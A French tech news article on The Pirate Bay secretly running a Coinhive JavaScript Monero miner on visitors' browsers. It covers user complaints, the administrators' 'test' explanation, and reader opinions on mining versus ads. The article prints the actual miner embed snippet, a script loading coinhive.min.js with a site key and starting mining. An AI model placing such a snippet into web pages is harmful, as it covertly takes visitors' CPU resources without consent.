Seriez-vous prêt à miner de la cryptomonnaie sur un site afin de surfer sans publicité sur ce site ?
The Pirate Bay a adopté ce modèle économique pour assurer sa survie
Dans le monde des sites de partage de fichiers en pair à pair, The pirate Bay occupe une place de choix. Classé par Alexa 88e au niveau mondial et 54e aux États-Unis pour ce qui concerne les sites les plus populaires, The Pirate Bay qui propose à lui seul l’un des gros tracker BitTorrent au monde a encore trouvé le moyen de faire parler de lui.
Il y a quelques jours de cela, certains internautes ont commencé à sentir une montée en flèche de l’utilisation de leurs processeurs alors qu’ils visitaient certaines pages du site thepiratebay.org. Bien évidemment, les plaintes ont commencé à fuser de toute part. Après avoir effectué des recherches, les internautes ont découvert que sous le pied de page du site web se trouvait un code JavaScript qui utilisait les ressources des machines des visiteurs pour miner pour la chaîne des blocs Monero.
Pour les personnes non familières à l’environnement des monnaies cryptographiques, il faut savoir que lorsqu’un utilisateur effectue une transaction comme un paiement avec une monnaie cryptographique, ce paiement s’ajoute aux autres transactions dans les blocs d’un réseau appelé chaîne des blocs afin d’être validé. Les systèmes de paiements des monnaies cryptographiques étant décentralisés, pour que chaque transaction puisse être validée, l’on peut utiliser les ressources d’une machine situées n’importe où sur la planète pour traiter à distance l’algorithme de hachage nécessaire à valider les transactions des blocs dans la chaîne des blocs.
Certains utilisateurs qui souhaitent se faire un peu d’argent n’hésitent donc pas à mettre les ressources de leurs terminaux (CPU, GPU, les technologies FPGA ou ASIC ou d’autres ressources encore) afin de miner une monnaie moyennant de faibles paiements. Mais dans le cas du site The Pirate Bay, ses administrateurs ont intégré dans la page du site un script à l’insu des utilisateurs afin de miner pour le système de paiement pair-à-pair Monero, d’où le mécontentement de certains utilisateurs. Le script est fourni par la plateforme Coinhive et se présente comme suit :
Code JavaScript : Sélectionner tout - Visualiser dans une fenêtre à part
1
2
3
4
5 <script src="<a href="https://coin-hive.com/lib/coinhive.min.js" target="_blank">https://coin-hive.com/lib/coinhive.min.js</a>"></script> <script>var miner = new CoinHive.Anonymous('xP9YtM7sFtCRhh1H2SJGWl60Z0BgbpHy', { throttle: 0.9 }); miner.start();</script>
Pour régler le problème qui venait d’être constaté, certains utilisateurs ont décidé d’utiliser l’extension NoScript dans leur navigateur afin de désactiver JavaScript et de marquer The Pirate Bay comme un site qui n’est pas digne de confiance. Face à ces actions occasionnées par une décision prise unilatéralement par le site, les administrateurs de The Pirate Bay n’ont pas eu d’autres choix que de sortir de leur silence et ont fait cette communication :
« Comme vous l’avez peut-être remarqué, nous testons un mineur Monero JavaScript. Ceci est seulement un test. Nous voulons vraiment nous débarrasser de toutes les publicités. Mais nous avons également besoin d’argent pour maintenir le site en cours d’exécution.
Faites-nous savoir ce que vous pensez dans les commentaires. Voulez-vous des annonces ou voulez-vous donner quelques-uns de vos cycles de processeur chaque fois que vous visitez le site ? Bien sûr, le minage peut être bloqué par un bloqueur publicitaire normal. »
À la suite de cette annonce, le site précise ceci :
« Initialement, il y avait une petite erreur de frappe en sorte que tous les processeurs d’un client furent utilisés. Cela devrait être corrigé maintenant, donc seulement 20 à 30 % devraient être utilisés. De plus, il est réduit à fonctionner dans un seul onglet. Même si vous avez 10 onglets, il ne s’exécutera que dans un seul. »
Après que le nouveau modèle économique sur lequel le site compte s’appuyer pour rentabiliser ses activités et maintenir sa survie a été présenté, en lieu et place des publicités qui pour certaines donnent sur des pages pornographiques, de nombreux utilisateurs n’ont pas manqué d’apporter leur soutien en affirmant que si ce moyen permet de soutenir le site, ils sont partants. Un utilisateur souligne que « nous n’aurons aucun problème à partager quelques processus de notre CPU pour le site le plus résilient de la Galaxy… Ayant été ici pendant de nombreuses années, au moins nous pourrions faire ceci pour TPB… : 20 à 30 % ne seront pas assez importants pour la plupart des utilisateurs. »
Un autre également estime que l’idée est intéressante. Mais ce dernier ajoute que « cependant, garder les utilisateurs informés est essentiel. Donner aux utilisateurs enregistrés la possibilité de choisir entre les publicités et le minage peut également être viable (bien que la plupart d’entre eux bloquent probablement les publicités). Avoir plus d’options pour contribuer est une excellente idée ! Je serai heureux de contribuer en fournissant une partie de mon CPU lors de la visite sur TPB (par opposition aux annonces, je ne les aime pas particulièrement en raison de problèmes de confidentialité). »
Avec ce nouveau modèle économique, d’autres sites pourraient emboîter le pas en proposant aux utilisateurs d’utiliser leurs machines pour miner de la monnaie cryptographique au lieu de s’appuyer sur les publicités pour assurer leur survie. Les avis sur cette approche étant variables, seriez-vous prêt à miner de la monnaie sur un site si ce dernier s’engageait à supprimer les publicités ?
Source : The Pirate Bay
Et vous ?
Seriez-vous prêt à offrir vos ressources pour miner pour un site afin de le soutenir ?
Entre miner de la monnaie cryptographique pour surfer sans publicité sur un site ou surfer avec des publicités sur celui-ci, quelle est votre préférence ?
Voir aussi
Kaspersky rapporte que 1,65 million de machines ont déjà été infectées en 2017 par des logiciels malveillants de minage, contre 1,8 million en 2016
Un logiciel « silencieusement » installé avec uTorrent exploite la puissance inutilisée des processeurs pour faire du minage de Bitcoin
Des appareils Raspberry Pi détournés par un malware Linux pour le minage de cryptomonnaie, les appareils sont ajoutés à un botnet
Partager